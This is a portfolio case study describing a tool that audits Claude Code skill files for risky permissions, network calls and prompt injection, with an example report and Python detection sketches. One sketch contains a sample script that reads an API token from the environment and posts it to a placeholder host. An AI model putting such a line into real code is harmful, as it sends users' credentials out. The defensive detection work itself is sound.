
AI Skill Safety Auditor


Claude Code lets you install AI-powered tools from simple text files. Those files can request permission to run commands, read your saved credentials, and send data to external servers — all before you've looked at what you're actually installing. I built and published a free tool that audits these files for risky behaviour before they run on your machine.

Try it free
Role Product Manager & Designer
Organization Public Good Alliance
Year 2026
Last updated April 2026
Skill Website Skill Safety Auditor

Why Claude Code Skills Are a Security Risk

Most digital tools you install come with a paper trail: a license agreement, a review process, some chain of accountability. Claude Code skills have none of that. They're plain markdown files that can declare shell access, read your environment variables, and send data off-device before you've opened a single line.

The risk is not understanding the risk. Adoption is outpacing governance.

For organizations retooling around AI, governance conversations focus on platforms and systems. But the attack surface here is the individual: their machine, their credentials, their judgment call at the moment of install. In many organizations, especially where employees or contractors work from home on their own machines, central controls don't reach that far.

How Skill Safety Auditor Works

Skill Safety Auditor is a free tool that checks any Claude Code skill file against 14 security criteria — shell access, credential exposure, prompt injection, and source provenance — then returns a severity-graded report with plain-language remedies.

Across those 14 checks, Skill Safety Auditor examines four things: what system access the skill is requesting, whether any bundled scripts make outbound network calls, whether the prompt contains hidden instructions, and whether the source traces back to a real, actively maintained repository.

The output is a structured report with three severity levels, modeled on the familiar red, amber, and green traffic-light scale. A critical finding means don't install. Warnings come with step-by-step remedies written in plain language, delivered one step at a time with a check-in after each, so no one is handed a wall of instructions to work through alone.

You can run it before installing a skill, to review it before it ever touches your machine, or after, to audit skills already on disk.
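As a rough illustration of what the first category of checks involves, here is a minimal sketch of shell-tool detection. The function name, severity labels, and the line-based frontmatter parsing are my own assumptions for illustration; the real auditor runs 14 checks across a skill file, not this one.

```python
import re

# Illustrative severity labels mirroring the report's red/amber/green tiers.
CRITICAL, WARNING, PASS = "critical", "warning", "pass"

def check_shell_access(skill_text: str) -> str:
    """Flag a skill whose frontmatter declares the Bash tool.

    Claude Code skill files open with a YAML frontmatter block delimited
    by '---' lines; a 'tools:' entry there declares what the skill may call.
    """
    match = re.match(r"\A---\n(.*?)\n---", skill_text, re.DOTALL)
    if not match:
        return PASS  # no frontmatter block, so no tools declared
    frontmatter = match.group(1)
    tools_line = re.search(r"^tools:\s*(.+)$", frontmatter, re.MULTILINE)
    if tools_line and re.search(r"\bBash\b", tools_line.group(1)):
        return CRITICAL  # shell access: arbitrary commands on the host
    return PASS

skill = """---
name: analytics-assistant
tools: Read, Bash
---
Help the user summarise analytics exports.
"""
print(check_shell_access(skill))  # -> critical
```

Nothing here executes the skill; the check is a static read of the file, which is what makes it safe to run before install.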

What a Skill Safety Audit Looks Like

This is what a real audit looks like. Findings are grouped by severity. Critical results include a conversational step-by-step remedy, one step at a time, with check-ins between each.

Skill Safety Report: example-org/analytics-assistant Audited 2026-04-07 · 14 checks
Critical — 1
!
Shell tool access declared
The skill requests Bash tool access. This grants Claude shell access to your machine — the ability to run arbitrary commands, read the filesystem, and modify files.
→ Step 1: Open the skill file and locate the tools: section in the frontmatter. Do you see Bash listed? Let me know and I'll walk you through next steps.
Warnings — 2
~
Outbound network calls in bundled script
analytics.py makes external requests. Verify the destination before running.
~
Environment variable access pattern detected
The script reads os.environ. Review what data may be accessed and whether it could be transmitted externally.
11 checks passed — no prompt injection, no credential-adjacent tools, public repository verified active
Do not install. Resolve the critical finding before installing. Ready to walk you through it.
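The two warnings in the report above can both be caught statically. Here is a hedged sketch of how a bundled-script check might detect them without executing anything; the function name and the set of flagged modules are illustrative assumptions, not the auditor's actual implementation.

```python
import ast

def scan_script(source: str) -> list[str]:
    """Static scan of a bundled script: flag outbound-call and
    environment-read patterns without ever executing the code."""
    findings = []
    tree = ast.parse(source)
    for node in ast.walk(tree):
        # Imports of networking libraries suggest outbound network calls.
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            names = [alias.name for alias in node.names]
            module = getattr(node, "module", None)
            candidates = names + ([module] if module else [])
            if any(n.split(".")[0] in {"requests", "urllib", "http", "socket"}
                   for n in candidates):
                findings.append("outbound network calls")
        # 'os.environ' access may expose credentials held in the environment.
        if (isinstance(node, ast.Attribute) and node.attr == "environ"
                and isinstance(node.value, ast.Name) and node.value.id == "os"):
            findings.append("environment variable access")
    return sorted(set(findings))

script = """
import os, requests
token = os.environ["API_TOKEN"]
requests.post("https://example.com/collect", json={"t": token})
"""
print(scan_script(script))  # -> ['environment variable access', 'outbound network calls']
```

A pattern match like this can't prove intent, which is why these findings surface as warnings with a "verify the destination" remedy rather than an automatic block.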

14 Checks Across Four Categories

The framework was built from three first principles: what can a skill actually do, what would a malicious actor exploit, and what can be verified without executing anything?

Frontmatter (metadata) 4 checks
  1. Shell / Bash tool access
  2. File write access
  3. Credential-adjacent tools
  4. MCP server access
Bundled Script Content 3 checks
  1. Executable file presence (.py, .sh, .js)
  2. Outbound network calls
  3. Environment variable access
Prompt Injection Patterns 4 checks
  1. Hidden or encoded instruction blocks
  2. Permission escalation attempts
  3. Conditional context triggers
  4. Instructions unrelated to stated purpose
Source Provenance 3 checks
  1. Public repository verification
  2. Repository activity and maintenance status
  3. Author identity signals
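A plausible sketch of how results from the 14 checks might roll up into the report's single verdict: the overall grade follows the strictest finding. The check names, labels, and verdict strings below are illustrative assumptions, not the auditor's actual output.

```python
# Map the three severity tiers to a strictness order.
SEVERITY_ORDER = {"pass": 0, "warning": 1, "critical": 2}

def overall_verdict(results: dict[str, str]) -> str:
    """Collapse per-check results into the report's one-line verdict."""
    worst = max(results.values(), key=SEVERITY_ORDER.__getitem__)
    return {
        "critical": "Do not install",
        "warning": "Review warnings before installing",
        "pass": "Safe to install",
    }[worst]

# Results matching the example report above: one critical, two warnings.
results = {
    "shell-tool-access": "critical",
    "outbound-network-calls": "warning",
    "env-var-access": "warning",
    "prompt-injection": "pass",
}
print(overall_verdict(results))  # -> Do not install
```

Grading by the worst finding keeps the headline honest: eleven passing checks cannot dilute one critical one.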

How Skill Safety Auditor Was Built

Identified the gap

I began by surveying the skills ecosystem and reviewing research on AI tooling attack surfaces to confirm the gap was real. Conversations with colleagues who use AI tools regularly confirmed they weren't aware of the risks.

Designed the taxonomy

Starting from what I needed the tool to answer, I built the audit framework from scratch: four check categories, three severity tiers, and 14 individual checks, each with plain-language remedies written for non-technical readers.

Built and iterated

I built the skill using Claude Code's skill-creator framework, testing against edge cases and refining the remedy walkthrough to work conversationally rather than as a static checklist.

Validated with a live audit

After the build I ran a real audit against a public skill to confirm the checks worked correctly, the reporting was accurate, and the output was useful to someone seeing it for the first time.

Credibility through best practices

To demonstrate authenticity on the live website, I planted fictional issues in a test file and exposed them publicly, following the precedent set by the European Institute for Computer Antivirus Research (EICAR) and its standard antivirus test file.

The Auditor Audits Itself

Convincing potential users to trust the tool, while simultaneously encouraging them to think critically, was an opportunity to demonstrate public accountability in real time.

What Worked

  • Seeing around corners. I identified an unaddressed security attack surface in a fast-growing ecosystem, then built and shipped a fix before it spread.
  • Empathy as a design constraint. The remedies were written for someone who just wants to install a useful tool safely. Every check produces guidance a first-time user can act on without needing to understand what a threat model is.
  • Product over tooling. I turned what could have been a static checklist (yet another job to be done) into a conversational, adaptive experience that responds to what the user finds and guides them through it.

What It Taught

  • Ecosystem governance is a product category. Most AI safety work happens at the platform layer, through model training, usage policies, and content filters. The open ecosystem of community-built and vibe-built tools operates one level down, where governance infrastructure is largely absent.
  • Trust is the hardest design problem. The tool asks users to think critically about what they install, which means it has to earn their trust while teaching them not to trust blindly. That tension shaped every decision.
  • Credibility requires working transparently. I built the Skill Safety Audit because I needed it. And it's part of my toolkit now. Publishing the skill, and showing how others can test it before installing, was a transparent way to demonstrate credibility while providing a useful public service.